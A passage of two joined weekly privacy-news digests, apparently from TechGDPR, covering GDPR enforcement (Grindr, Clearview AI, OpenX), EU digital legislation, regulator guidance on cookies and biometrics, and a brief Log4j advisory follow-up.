Meanwhile the EU agency for Cyber Security, ENISA, published an explainer on Remote identity proofing. Online users expect access to various services anytime and anywhere. The need to securely onboard and prove a customer’s identity remotely is therefore becoming critical for organisations. Identity and technology providers have implemented both active and passive security controls which mostly involve the use of video and operator intervention ((eg, biometric acquisition, liveness checks, ID acquisition, authenticity checks, face comparison). Video allows a greater number of security checks and operators help artificial intelligence to identify any new types of attack. Although many have faith in facial recognition technology, algorithms cannot understand and detect new fraud techniques, (eg, deep fakes), on their own. Therefore, humans are needed to clean and tag data enabling quality training that will result in better performance and the mitigation of adversarial attacks.

Audits: Emailmovers Ltd

Following a test data purchase initiative run by the UK Information Commissioner Office, (ICO), Emailmovers Ltd, (EML), were investigated as serious concerns were identified about their data protection compliance. The investigation resulted in an enforcement notice followed by a consensual audit of the company systems. The checks took one week. The scope of the audit focused on the processing of personal data within EML’s marketing database and covered the following key control areas: governance, sourcing personal data, transparency and lawful basis for processing, data supply and sharing, individual rights. The ICO identified both good practices, (proactive approach,  training, managerial involvement in decision making), and areas for improvement, (defining retention periods, maintaining a record of processing activity and decisions taken, notifying recipients of personal data about the existence and outcomes of individual rights), which can be read in the audit documentation.  

AI: taxonomy and business models

The European Institute of Innovation and Technology published two reports on Artificial Intelligence business models and taxonomy in Europe. Both reports give in-depth recommendations on how to streamline knowledge, experience and expertise in AI deployment as well as connect, share and encourage an open innovation environment with policy leaders, industrial experts and innovator communities, (AI application providers, infrastructure providers and adopters). The trust ecosystem on Ethical AI includes but is not limited to such dimensions: 

• human agency and oversight;
• technical robustness and safety (Including resilience to attack and security, fall back plan and general safety, accuracy, reliability and reproducibility); 
• privacy and data governance (Including respect for privacy, quality and integrity of data, and access to data); 
• transparency (Including traceability, explainability and communication); 
• diversity, non-discrimination and fairness (Including the avoidance of unfair bias, accessibility and universal design, and stakeholder participation), and more.

Big Tech: Apple AirTags, Google’s age-appropriate policy

Police across the US are reporting cases where stalkers have used Apple AirTags to target their victims, according to the Guardian. Paired with the FindMy app, the attachable coin-sized gadget was designed so you would never lose anything again, but slipped into a bag or coat pocket it is the perfect tracking device for criminals. Other international police forces have also reported similar abuse of the AirTag, and associated car theft. While the AirTag’s several anti-abuse features mean it is less dangerous than other stalkerware available, an additional problem is the inconsistency of police response. A 2021 Norton report claims stalkerware is growing fast, jumping in 2020 and the first half of last year.

Google has fallen foul of the rules of the UK’s Children’s code, introduced last September, which sets online services 15 privacy and design standards to protect minors. Google said it would immediately improve enforcement of an age-sensitive ad policy after Reuters reported age-sensitive advertising for high-risk financial instruments, adult toys and alcohol was evading Google’s filters and safeguards. Campaigners 5 Rights Foundation, which reviewed Reuters findings, say all tech companies should do more to ensure compliance with the new rules and consumers should beware of “safety washing” as there were still too many cases, indicating companies had yet to get serious about implementing changes.

The post Weekly digest January 17 – 23, 2022: EU Digital strategy, smart transport and cities, AI taxonomy, Bluetooth security appeared first on TechGDPR.

Grindr’s privacy fine in focus

Norway’s data protection authority has handed Grindr, the world’s largest social networking app for LGBTQ people, an over 6 mln euro privacy fine for disclosure of user data to third parties behavioural ads without a legal basis. The offenses were committed before April 2020, when its terms of use and consent management platform were updated. In 2020, the Norwegian Consumer Council filed a complaint against US-based Grindr, saying the app had illegally shared users’ GPS locations, IP addresses, ages, gender, and use of the app. Last week the regulator stated that Grindr shared such data through software development kits included in the Grindr app, often used to facilitate communication between the apps and the advertising vendors. At the same time, Grindr failed to comply with the most of the requirement for freely given, specific, informed and unambiguous consent and its withdrawal for such data sharing:

• users were forced to accept the privacy policy through the previous CMP in its entirety to use the app;
• the consents for sharing data with its advertising partners that Grindr collected were bundled with acceptance of the privacy policy as a whole (users were not asked specifically if they wanted to allow their data to be shared with third parties ads);
• the information about the sharing was not properly communicated to users;
• refusing consent was dependent on the user’s patience and technological understanding, and it did not demonstrate a fair, intuitive and genuine free choice.

Grindr argued that users who pressed “Cancel” when asked to accept the privacy policy, could upgrade to the paid version. However, the regulator  pointed out, at the time of registration the users were not given the choice to opt for the paid version of the app. The user would first have to go through the above described consent mechanism. It was only after this process that the user could decide to upgrade to the paid version. 

Grindr also argued that its advertising partners – in the event they would ever theoretically receive sensitive personal data – must “blind” themselves pursuant to Art. 25 of the GDPR, (Data protection by Design and by Default). Participants in the ad tech ecosystem would likely only receive a “blinded” app-ID and not the corresponding app name. However, in a different statement, Grindr also recognised that “all apps and all websites that serve advertising necessarily share the identity of the app and/or the website with their advertising partners. Simply put, it is highly unlikely any advertiser would purchase advertising on an unknown app or an unknown website.” 

The Norwegian regulator however stated that even if the app-ID in some instances was “blinded”, the recipient could still receive keywords relating to the Grindr app. As an example, OpenX, who Grindr consider to be its processor, appended keywords “gay”, “bi” and “bi-curious” in ad calls. This would have a similar effect to disclosing that the data subject is a Grindr user, and also constitute processing of personal data “concerning” an individual’s “sexual orientation” (Art. 9 of the GDPR). Read a 70-page fine notice of the Grindr case (available in English) with more facts and relevant GDPR provisions explained.

Data breaches, investigations and enforcement actions: ransomware attack, Clearview AI, children’s data

In Finland, a psychotherapy Center was issued a privacy fine over a failure to properly secure the processing of personal data and to report a security breach. The company notified the data protection commissioner in September 2020. The company found a blackmail message: the patient database has been uploaded to the attacker’s servers and a ransom was demanded to recover the lost data. A sample of the patient database was attached to the threat letter. Later it became clear that the hacking had probably already taken place in 2018, and another hack took place in 2019 due to the poor protection of the patient information system. The data protection impact assessment carried out by the respondent also did not meet the requirements of Art. 35 (7) of the GDPR. Finally, the company did not have a documented notification procedure in place at the time of the security breaches.

French regulator CNIL has ordered US-based Clearview AI, a facial recognition company that has collected billions of publicly-available images worldwide, to stop illegal use of biometric data from people in France and delete it within two months. The UK Information Commissioner’s Office, which worked with the Australians on the Clearview investigation, also said last month it intended to fine Clearview 17 mln pounds for alleged breaches of data protection law.

California-based online advertising platform OpenX Technologies will be required to pay 2 mln dollars to settle Federal Trade Commission allegations that the company collected personal information from children under 13 without parental consent, a direct violation of a federal children’s privacy protection law. The FTC also alleged that despite offering an opt-out option, OpenX collected geolocation information from users who specifically asked not to be tracked. The FTC’s investigation reviewed hundreds of child-directed apps with terms that identified the intended audience as “for toddlers,” “for kids,” “kids games,” or “preschool learning,” and included age ratings for the apps indicating they were directed to children under 13. However, these apps and their data were not flagged as child-directed and participated in the OpenX ad exchange, according to the FTC. 

Legal processes and redress: LED, DMA, DSA, US/AU Cloud Act 

The EDPB published its contribution to the EU Commission’s evaluation of the Data protection Law Enforcement Directive (LED). It is a piece of EU legislation, parallel to the GDPR, which also came into effect in 2018. LED aims at supporting the possibility of police authority co-operation through the exchange of personal data. Previously, EU legal instruments in this area have been limited to data protection rules for EU agencies, large scale IT systems established under EU law or cross-border exchanges of personal data in the context of police and judicial cooperation in criminal matters. However, new legislative and technological developments in the processing of data for law enforcement purposes have increased the workload of EDPB members. Also, data protection authorities may often have to balance their resources between supervision of the GDPR and the LED, noting: “more crucial than the number of available staff are the skills of the experts, who should cover a very broad range of issues – from criminal investigations and police cooperation to big data analytics and AI”.

The EU Parliament is ready to start negotiations with the Council on the Digital Markets Act (DMA). The text, now approved by MEPs, blacklists certain practices used by large platforms acting as “gatekeepers” and enables the Commission to carry out market investigations and sanction non-compliant behaviours. Core services will include not only social networks, search engines, operating systems, online advertising services, cloud computing, and video-sharing services, but also web browsers, virtual assistants and connected TV. The approved text also includes additional requirements on:

• the use of data for targeted or micro-targeted advertising and the interoperability of services, (eg, number-independent interpersonal communication services, social network services);
• gives users the option to uninstall pre-installed software applications, such as apps, on a core platform service at any stage. 

The text approved will be Parliament’s mandate for negotiations with EU governments, planned to start in the first semester of 2022. The Digital Services Act (DSA) – a parallel proposal to regulate online platforms dealing with, among other issues, profiling algorithms, deceiving or nudging techniques to influence users’ behaviour through “dark patterns” – is due to be put to the vote in plenary in January. Read also the latest analysis of the DSA’s possible effect for EU residents’ fundamental rights and freedoms by Baker McKenzie. 

Meanwhile, Australia and the US signed a Cloud Act deal to help law enforcement agencies demand data from tech giants, the Guardian reports. It will allow Australian and US law enforcement agencies to use existing warrants to demand information from overseas-based companies and communications service providers, reducing the time taken to obtain information. “It means companies including email providers, telcos, social media platforms, and cloud storage services could soon find themselves answering warrants from law enforcement agencies based in the US or Australia rather than their home jurisdiction”, the Guardian reports.

Official guidance: SMEs, developers, biometrics, cookies

The French regulator CNIL published a new version of its GDPR guide for developers (in French). The new content relates in particular to the use of cookies and other online tracers and on audience measurement solutions. It also draws up a non-exhaustive list of vulnerabilities that have led to data breaches notified to the CNIL, and presents examples of measures that would have made it possible to avoid them. In total, the guide now includes 18 thematic sheets that cover most of the developers’ needs to support them at each stage of their project from identifying and minimizing the personal data collected to preparing for the exercise of data subjects rights, managing the retention periods, and technical implementation of legal bases.

The CNIL is also continuing its action plan to ensure compliance by companies that use cookies. Since May 2021 the CNIL has sent out around 60 formal notices. Online checks have revealed that a number of organizations still do not allow online users to refuse cookies as easily as to accept them. The CNIL decided to send 30 new formal notices. The recent checks observe that:

• cookies, subject to consent, were automatically placed on the user’s terminal equipment before acceptance;
• information banners are still not compliant because they do not allow the user to refuse cookies as easily as accepting them;
• information banners can offer the user a means of refusing cookies with the same degree of simplicity as that provided for accepting them, but the proposed mechanism is not effective because cookies, subject to consent, are still placed after the refusal expressed by the user.

The following are particularly affected by these new formal notices: public establishments, higher education establishments, the clothing industry, transport sector, mass distribution sector, and distance selling sector.

In Germany, the Saxony-Anhalt data protection commissioner published its guide for small and medium-sized companies (in German only). Craftsmen, merchants and freelancers in various industries collect, store and use personal data from customers, employees or suppliers, often in a variety of ways – and must comply with data protection. The State Commissioner has received numerous inquiries from these companies for a long time. 

• What customer or employee data is a company allowed to collect? 
• How long may the data be stored? 
• What should be done when customers exercise their data protection rights or employee data has been encrypted by a cyber attack?

Answers to these and many other typical questions are provided by the State Commissioner in the newly published guide. Read the full text here.

The Belgian data protection authority published its final recommendation on the use of biometrics (in French and Dutch). Biometric data is qualified as a special category of personal data (Art. 9 GDPR). The recommendation includes a general prohibition to process such data, unless a specific ‘derogation’ is granted, either the explicit consent of the data subject, or the necessity for reasons of substantial public interest. Since there is currently no legal norm in Belgian law that authorizes the processing of biometric data for the authentication of individuals, and insofar as explicit consent cannot be invoked, such processing is currently performed without a legal basis. Other key takeaways are:  

• it is important to consider whether the performance of a contract or the provision of a service is conditioned on the consent being provided. 
• a presumption of consent not being “freely given”, exists in particular in employer-employee relationships and where a product or service has a (quasi-) monopoly in the market.
• Purpose limitation, data minimization and proportionality principles are particularly important for the processing of biometric data.
• Data protection impact assessments will generally be required. 
• No transition period for companies is provided. 

Opinion: What if your boss was an algorithm?

Privacy International with its partners have teamed up to challenge the unprecedented surveillance that gig economy workers are facing from their employers. They decided to file over 500 data subject access requests, (DSARs), to seven companies – Amazon Flex, Bolt, Deliveroo, Free Now, Just Eat, Ola, and Uber. They also interviewed gig-workers. According to their report, several gig economy employers seem reluctant to fully comply with their data protection obligations. The investigation was unable to obtain information about how algorithms calculate a score which is then used to prioritise dispatch of journeys to drivers. Some companies also failed to provide the guidance documents or location data that is gathered. Finally, the report demonstrates that surveillance is not just vast data collection, but also the use of more invasive technologies. The report provides specific examples where facial recognition technology ended up locking drivers out of their account due to potential identity verification failures.

Data security: Log4j follow up

The EU Commission, the EU Agency for Cybersecurity, CERT-EU and the network of the EU’s national computer security incident response teams have been closely following the development of the Log4Shell vulnerability since 10 December. It is a flaw in the well-known open source Java logging package Log4j, which is maintained by the Apache Software Foundation. Log4j is used in a wide array of applications and web services across the globe. Due to the nature of the vulnerability, its ubiquity and the complexity of patching in some of the impacted environments, it is important that all organisations, especially entities who fall under the Network and Information Security Directive, assess their potential exposure as soon as possible. The latest recommendations so far could be found in:

• list of vulnerable software, maintained by the Dutch National Cyber Security Center,
• advisory notices published by the CSIRTs Network Members in their relevant official communication channels,
• guidance given by CERT-EU.

Big Tech: E2EE, “buy-now, pay-later”, 5G smart factories, smartphones duopoly

Microsoft is rolling out end-to-end encryption, (E2EE), support for Microsoft Teams, the Verge reports. After announcing the feature earlier this year and testing a public preview since October, Teams is getting the E2EE security support for all one-to-one calls. Microsoft currently encrypts data in transit and at rest, allowing authorized services to decrypt content. Microsoft also uses SharePoint encryption to secure at-rest files and OneNote encryption for notes stored in Microsoft Teams. All chat content in Teams is also encrypted in transit and at rest.

US telecom giant Verizon signed a deal with Alphabet’s Google Cloud to use its 5G network and the tech firm’s computing power to offer services such as autonomous robots and smart factories, says Reuters. Telecom companies have been partnering with technology firms to automate businesses and factories to lower costs and speed up data traffic through private 5G networks that do not jostle for speed with others on a public network. Verizon has also been making private 5G deals in several countries and has partnered with other cloud operators such as Microsoft’s Azure and Amazon’s AWS. Reportedly “a camera attached to an autonomous mobile robot will scan packages to maintain inventory and using computer vision, the robot will send details over 5G to an inventory management system, providing real-time analytics”, the companies said.

The US Consumer Financial Protection Bureau, (CFPB), asked five “buy-now, pay-later” companies – Affirm, Afterpay, Klarna, PayPal and Zip Co – for information on their business practices, amid concerns that the financial products are putting consumers and their data at risk. The CFPB is concerned about “accumulating debt, regulatory arbitrage, and data harvesting” and is seeking data on the risks and benefits of the products. As an example, a recent survey by personal finance company Credit Karma found that one-third of US consumers who used “buy-now, pay-later” services have fallen behind on one or more payments, and 72% of those said their credit scores declined.

Apple and Google have a “vice-like grip” over people’s mobile phones and their duopoly over the market should be investigated by the proposed new regulator, the UK’s competition authority, the CMA. The two companies effectively control users’ mobile phone experience in the UK, with their operating systems installed on 99.45% of all phones in the country: “Once a consumer buys a phone they are essentially wedded to the ecosystem of one of the two companies – Apple’s App Store or Google’s Play Store and their respective web browsers Safari or Chrome”. The new Digital Markets Unit, (DMU), which will be part of the CMA, has been set up in shadow form until the government officially grants it regulatory powers. The DMU will enforce a code of conduct that the tech giants must follow when dealing with rivals and third parties. The code will affect only those companies deemed to have strategic market status, although no tech firms have been officially awarded that status yet, the Guardian reports.

The post Weekly digest December 13 – 19, 2021: Grindr’s privacy fine, guide for SMEs and developers, 5G smart factories appeared first on TechGDPR.